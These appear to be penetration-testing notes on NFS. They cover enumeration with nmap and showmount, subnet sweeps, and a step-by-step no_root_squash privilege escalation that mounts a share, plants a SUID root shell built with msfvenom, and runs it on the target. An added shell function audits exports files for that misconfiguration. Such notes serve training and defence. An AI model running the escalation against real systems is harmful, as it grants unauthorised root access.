# NFS

## Network File System - Port 2049

* Allows a user on a client computer to access files over a network as if they were local

```
nmap -sV --script=nfs-showmount <tgt>
showmount -e <tgt>
```

## NFS - Find and Enum

```
nmap -v -p 111 10.x.x.0/24 -oG nfs.nmap
cat nfs.nmap | grep 111 | grep -v "Nmap" | awk '{print $2}' > nfs.ip 
nmap -sV -p111 --script=rpcinfo -iL nfs.ip
ls -l /usr/share/nmap/scripts/nfs*
nmap -p111 --script "nfs*" -iL nfs.ip -oN nfs.enum
```

## NFS - Sweep

* Wildcard NSE didn't work well
* Better to run the NSE scripts individually or in a loop

```
# Sweep the range and keep the hosts with an open port
nmap -sV -p111,2049 10.x.x.0/24 -oG nfs.nmap
grep open nfs.nmap | cut -d' ' -f2 > nfs.ip

# Run the RPC and NFS scripts against the hosts found
nmap -sV -p111,2049 --script=rpcinfo -iL nfs.ip -oN rpc_scripts.nmap
nmap -sV -p111 --script="nfs*" -iL nfs.ip -oN nfs_scripts2.nmap

# Run each NFS script on its own
for script in /usr/share/nmap/scripts/nfs*; do
  nmap -p 111 --script "$(basename "$script")" 10.11.1.72
done
```

## NFS Root Squashing

* Network File System
* Send a **rootbash** over NFS, with local root impersonating remote root
* Only works if "**no\_root\_squash**" is set on the export
* Remote users can mount, access, create and modify files
  * Default: created files inherit the remote user/group ID
  * Even if that user is not on the NFS server
* How NFS protects against the obvious privesc
  * If a remote user claims to be root (uid=0)
  * NFS will squash it and treat it as nobody
  * This feature can be disabled!
* REF: [TarBackups](https://pentest.mxhx.org/06-linux-privesc/tar-backup-tricks)

```
# -------------------------
showmount -e <tgt>
nmap -sV --script=nfs-showmount <tgt>
mount -o rw,vers=2 <tgt>:<share> <localdir>

# -------------------------
lse.sh -l 2 -i    # found nfs share
cat /etc/exports
# /tmp *(rw,sync,no_root_squash)

# -------------------------
# Local:
showmount -e 192.x.y.z
mkdir /tmp/nfs
mount -o rw,vers=2 192.x.y.z:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf

# -------------------------
# Target:
ls -l /tmp        # owned by root, with suid
/tmp/shell.elf    # executed as root
# root!!
```
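
On the server side, the `/etc/exports` line above is the thing to audit for. The following is an added example, not part of the original notes: a shell function that parses an exports(5) file, including `-` default options, continuation lines and the `host (opts)` spacing mistake, and reports every client that ends up with `no_root_squash`. The function name `audit_exports`, the severity labels and the sample hosts are assumptions.

```sh
# Added example (not from the original notes): report exports(5) entries that
# disable root squashing. Assumes export paths contain no spaces.
# Output per finding: SEVERITY<TAB>path<TAB>client<TAB>effective options
audit_exports() {   # $1 = exports file (default /etc/exports)
    awk '
    { sub(/#.*/, "") }                                   # drop comments
    /\\[ \t]*$/ { sub(/\\[ \t]*$/, " "); buf = buf $0; next }  # continuation
    {
        line = buf $0; buf = ""
        gsub(/^[ \t]+|[ \t]+$/, "", line)
        if (line == "") next
        n = split(line, f, /[ \t]+/); defaults = ""
        for (i = 2; i <= n; i++) {
            spec = f[i]
            if (spec ~ /^-/) { defaults = substr(spec, 2); continue }
            client = spec; opts = defaults
            p = index(spec, "(")
            if (p) {
                client = substr(spec, 1, p - 1)
                inner = substr(spec, p + 1); sub(/\).*/, "", inner)
                opts = (defaults == "" ? inner : defaults "," inner)
            }
            if (client == "") client = "*"    # "(opts)" alone: every host
            squash = 1; rw = 0                # exports(5) defaults
            m = split(opts, o, ",")
            for (j = 1; j <= m; j++) {        # last option wins
                if (o[j] ~ /^(no_)?root_squash$/) squash = (o[j] == "root_squash")
                if (o[j] == "rw" || o[j] == "ro") rw = (o[j] == "rw")
            }
            if (squash) continue
            sev = rw ? ((client ~ /[*?]/) ? "CRITICAL" : "HIGH") : "MEDIUM"
            printf "%s\t%s\t%s\t%s\n", sev, f[1], client, opts
            found = 1
        }
    }
    END { exit found ? 1 : 0 }' "${1:-/etc/exports}"
}

# Constructed sample input; the first entry is the export shown in these notes.
sample=$(mktemp)
cat > "$sample" <<'EOF'
/tmp        *(rw,sync,no_root_squash)
/srv/build  10.0.0.5(rw,no_root_squash) 10.0.0.6(rw,root_squash)
/srv/ro     -ro,no_root_squash \
            backup.example.internal
/data       10.0.0.7 (rw,no_root_squash)
EOF
audit_exports "$sample" || echo "exports with no_root_squash found" >&2
rm -f "$sample"
```

The function exits non-zero when it reports anything, so it can gate a config-management or CI check on the NFS server.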
